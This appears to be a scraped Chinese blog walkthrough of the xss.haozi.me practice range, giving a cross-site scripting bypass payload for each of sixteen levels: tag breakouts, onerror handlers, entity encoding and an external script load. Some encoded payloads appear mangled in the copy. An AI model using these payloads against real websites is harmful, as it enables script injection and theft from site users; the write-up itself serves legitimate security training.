当前位置:网站首页>XSS range intermediate bypass
XSS range intermediate bypass
2022-08-01 19:32:00 【You're still there when you come back from the army】
XSSRange intermediate bypass resolution
靶场环境—https://xss.haozi.me/
第一关:
divBlocks are ordinary elements,直接写入< script >标签即可.
<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>
第二关:
逃脱< textarea>标签,直接闭合.
</textarea><script>alert(1)</script></textarea>
第三关:
escape the double quotes,闭合input.
a"><script>alert(1)</script>
第四关:
Parentheses are already filtered,所以利用mtml实体编码,编译成().
<img src=1 onerror="alert(1)">
第五关:
过滤了括号,反引号,尖括号,还是利用html实体编码.
<img src=1 onerror="alert(1)">
第六关:
Transform into a smiley face,利用注释符,直接闭合.
--!><script>alert(1)</script><!--
第七关:
换行,然后进行过滤
type = "image" src=1 onerror
=alert(1)
第八关:
Backslashes are filtered,尖括号,标签不生效.img标签可以执行,But can't complete tags,htmlwill miss.
<img src ="1" onerror="alert(1)"
第九关:
输出在< style>里面,Only text can appear,不能写js ,闭合< style>也不行.Close with a newline.
</style
><script>alert(1)</script>
第十关:
以https://www.segmentfault.com开头,将script标签闭合.
https://www.segmentfault.com"></script><script>alert(1)//
第十一关:
还是以https://www.segmentfault.com"开头.利用重定向,新建一个txrt文件,写入alert(1).
https://[email protected]/txrt.js
第十二关:
Convert all letters to uppercase.利用实体编码,Convert all letters to 16进制.
<img src=1 onerror=" alert(1)">
第十三关:
Converted to uppercase and filteredscript标签.
<img src=1 onerror=" alert(1)">
第十四关:
Annotated everything,Still using annotations.
alert(1)
-->
第十五关:
利用是“s”可以转化为“ſ”.
<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=alert(1)>
第十六关:
Convert content to entity encoding,But it works.html认识.
aa');alert(1)//
边栏推荐
- 【软考软件评测师】基于规则说明的测试技术下篇
- Website construction process
- 有序双向链表的实现。
- 使用常见问题解答软件的好处有哪些?
- [pyqt5] Custom controls to achieve scaling sub-controls that maintain the aspect ratio
- 力扣刷题之求两数之和
- 升哲科技携全域数字化方案亮相2022全球数字经济大会
- Write code anytime, anywhere -- deploy your own cloud development environment based on Code-server
- Multi-Party Threshold Private Set Intersection with Sublinear Communication-2021:解读
- 【木棉花】#夏日挑战赛# 鸿蒙小游戏项目——数独Sudoku(3)
猜你喜欢
Win11如何删除升级包?Win11删除升级包的方法
10 个 PHP 代码安全漏洞扫描程序
PHP 安全最佳实践
What should I do if the Win11 campus network cannot be connected?Win11 can't connect to campus network solution
安装win32gui失败,解决问题
力扣刷题之移动零
Mobile Zero of Likou Brush Questions
#yyds dry goods inventory# Interview must brush TOP101: the last k nodes in the linked list
八百客、销售易、纷享销客各行其道
Risc-v Process Attack
随机推荐
To drive efficient upstream and downstream collaboration, how can cross-border B2B e-commerce platforms release the core value of the LED industry supply chain?
不要再使用MySQL online DDL了
{ValueError}Number of classes, 1, does not match size of target_names, 2. Tr
PROE/Croe如何编辑已完成的草图,让其再次进入草绘状态
屏:全贴合工艺之GFF、OGS、Oncell、Incell
锐捷交换机基础配置
工作5年,测试用例都设计不好?来看看大神的用例设计总结
安装win32gui失败,解决问题
网络不通?服务丢包?这篇 TCP 连接状态详解及故障排查,收好了~
通配符 SSL/TLS 证书
Screen: GFF, OGS, Oncell, Incell of full lamination process
驱动上下游高效协同,跨境B2B电商平台如何释放LED产业供应链核心价值?
重保特辑|筑牢第一道防线,云防火墙攻防演练最佳实践
58:第五章:开发admin管理服务:11:开发【管理员人脸登录,接口】;(未实测)(使用了阿里AI人脸识别)(演示了,使用RestTemplate实现接口调用接口;)
MLX90640 Infrared Thermal Imager Temperature Measurement Module Development Notes (Complete)
From ordinary advanced to excellent test/development programmer, all the way through
Keras深度学习实战——交通标志识别
XSS靶场中级绕过
安装GBase 8c数据库的时候,报错显示“Resource:gbase8c already in use”,这怎么处理呢?
对于web性能优化我有话说!